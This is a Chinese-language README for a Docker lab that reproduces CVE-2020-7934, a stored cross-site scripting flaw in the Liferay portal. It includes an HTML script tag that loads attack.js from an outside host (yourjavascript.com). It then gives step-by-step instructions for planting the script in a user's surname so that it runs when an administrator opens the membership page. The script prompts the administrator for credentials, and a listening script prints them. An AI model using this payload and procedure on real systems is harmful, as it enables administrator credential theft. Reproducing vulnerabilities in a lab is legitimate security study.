CVE 2020-7934
如何运行CVE
要求
- docker
备注
可以将攻击脚本放在线上(提供JS代码)http://yourjavascript.com/
我们用于攻击的JS脚本在线
html <script src="http://yourjavascript.com/920172199111/attack.js"></script>
配置命令
- 进入本项目的根目录
- 运行 "sudo docker-compose up --build"
- 新终端:运行 "docker inspect liferay" ==> 并复制IPAddress的值
- 新终端:运行 "python api_attacker.py"
- 打开浏览器,访问 "http://IPAddress:8080" ==> 应看到liferay门户作为响应
- 停止并删除容器使用 "sudo docker-compose rm"
攻击步骤
- 在liferay中注册为用户,登录,并在"可用站点"部分加入"liferay"站点。
- 将"姓氏"更改为JS脚本(直接使用 () 或通过 "src =" http ... "")
- 以管理员身份登录liferay(用户名:[email protected],密码:test)
- 转到可用站点,点击"liferay",将打开该站点的公共页面。
- 转到新页面,右侧会打开一个菜单,点击"成员资格"(membership)。
- 选择在步骤1中注册的用户。此时脚本将被执行。
5.1) 在脚本attack.js中,页面将要求输入凭据。
- 在步骤5(配置命令中的步骤5)的终端中,将打印步骤5.1中输入的(由管理员输入的)用户名/密码。